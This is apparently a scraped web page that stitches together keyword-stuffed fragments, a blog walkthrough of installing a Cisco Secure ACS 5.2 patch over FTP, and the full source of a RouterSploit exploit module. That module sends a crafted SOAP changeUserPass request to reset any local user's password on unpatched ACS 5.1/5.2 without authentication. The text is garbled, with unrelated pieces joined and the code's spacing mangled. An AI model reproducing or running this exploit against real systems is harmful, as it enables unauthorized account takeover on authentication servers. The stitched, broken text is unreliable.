Cisco Acs 5.2 Patch Installation
Installation and Upgrade Guide for the Cisco Secure. ACS 5.2 patch. Management > Cisco Secure Access Control Server Products > Cisco Secure Access. Patch installation for abeans 1.28 1. Help and information on problems can be found in the ACS Frequently Asked Questions 2.5. ALMA ACS Installation Manual. Mar 31, 2011 - Cisco Secure ACS operates as a centralized RADIUS and TACACS+ server. Cisco Secure ACS version 5.2 without any patches installed.
I had to patch my ACS 5.2 server couple of times & thought of describing the process here. First of all you need to download the correct patch from Cisco web site. You can find that via Products->Security->Access Control and Policy->Policy and Access Management->Cisco Secure Access Control Systemor via this direct link. You should have valid CCO account & ACS product purchased from Cisco with valid contract.
In my case I have downloaded latest patch “5-2-0-26-11.tar.gpg” for my ACS 5.2 server. You need to create a software repository on your ACS before copying this file onto it. You can do this via “System Administration > Operations > Software Repositories”. Here is the screenshot of my software repository created for this.
You can choose multiple protocols, but I selected FTP after doing quick search on web. Lots of users reporting TFTP did not work properly, etc. Here is the complete list of values you can choose from.
I used free FTP server (called FileZilla) installed on my laptop, while creating username password for ACS to talk to it. Then you can install the patch into ACS server by issuing “acs patch install <filename> repository <repository-name> ” CLI command. Here is the screenshot of my file transfer.
You can verify the progress on ACS CLI as well. You should see something similar to this.
Once patch installed you can verify the application status by “show application status acs” & “show version” CLI commands. Below screenshot confirmed application is running correctly.
If you are using GUI you can confirm the same by clicking “About” button on the ACS admin page
.
PermalinkJoin GitHub today
GitHub is home to over 36 million developers working together to host and review code, manage projects, and build software together.
Sign upBranch:master
Cisco Acs Configuration Guide
| from routersploit.core.exploit import* |
| from routersploit.core.http.http_client import HTTPClient |
| classExploit(HTTPClient): |
| __info__ = { |
| 'name': 'Cisco Secure ACS Unauthorized Password Change', |
| 'description': 'Module exploits an authentication bypass issue which allows arbitrary ' |
| 'password change requests to be issued for any user in the local store. ' |
| 'Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well ' |
| 'as version 5.2 with either no patches or patches 1 and 2 are vulnerable.', |
| 'authors': ( |
| 'Jason Kratzer <pyoor[at]flinkd.org>', # vulnerability discovery & metasploit module |
| 'Marcin Bury <marcin[at]threat9.com>', # routersploit module |
| ), |
| 'references': ( |
| 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html', |
| ), |
| 'devices': ( |
| 'Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed', |
| 'Cisco Secure ACS version 5.2 without any patches installed', |
| 'Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed', |
| ), |
| } |
| target = OptIP('', 'Target IPv4 or IPv6 address') |
| port = OptPort(443, 'Target HTTP port') |
| ssl = OptBool(True, 'SSL enabled: true/false') |
| path = OptString('/PI/services/UCP/', 'Path to UCP WebService') |
| username = OptString('', 'Username to use') |
| password = OptString('', 'Password to use') |
| defrun(self): |
| headers = {'SOAPAction': ''changeUserPass''} |
| data = ('<?xml version='1.0' encoding='utf-8'?>'+'rn' |
| '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' ' |
| 'xmlns:SOAP-ENC='http://schemas.xmlsoap.org/soap/encoding/' ' |
| 'xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' ' |
| 'xmlns:xsd='http://www.w3.org/1999/XMLSchema'>'+'rn' |
| '<SOAP-ENV:Body>'+'rn' |
| '<ns1:changeUserPass xmlns:ns1='UCP' SOAP-ENC:root='1'>'+'rn' |
| '<v1 xsi:type='xsd:string'>'+self.username +'</v1>'+'rn' |
| '<v2 xsi:type='xsd:string'>fakepassword</v2>'+'rn' |
| '<v3 xsi:type='xsd:string'>'+self.password +'</v3>'+'rn' |
| '</ns1:changeUserPass>' |
| '</SOAP-ENV:Body>'+'rn' |
| '</SOAP-ENV:Envelope>'+'rnrn') |
| print_status('Issuing password change request for: '+self.username) |
| response =self.http_request( |
| method='POST', |
| path=self.path, |
| data=data, |
| headers=headers |
| ) |
| if response isNone: |
| print_error('Exploit failed. Target seems to be not vulnerable.') |
| return |
| if'success'in response.text: |
| print_success('Success! Password for {} has been changed to {}'.format(self.username, self.password)) |
| elif'Password has already been used'in response.text: |
| print_error('Failed! The supplied password has already been used.') |
| print_error('Please change the password and try again.') |
| elif'Invalid credentials for user'in response.text: |
| print_error('Failed! Username does not exist or target is not vulnerable.') |
| print_error('Please change the username and try again.') |
| else: |
| print_error('Failed! An unknown error has occurred.') |
| @mute |
| defcheck(self): |
| # it is not possible to verify if target is vulnerable without exploiting system |
| returnNone |
Copy lines Copy permalink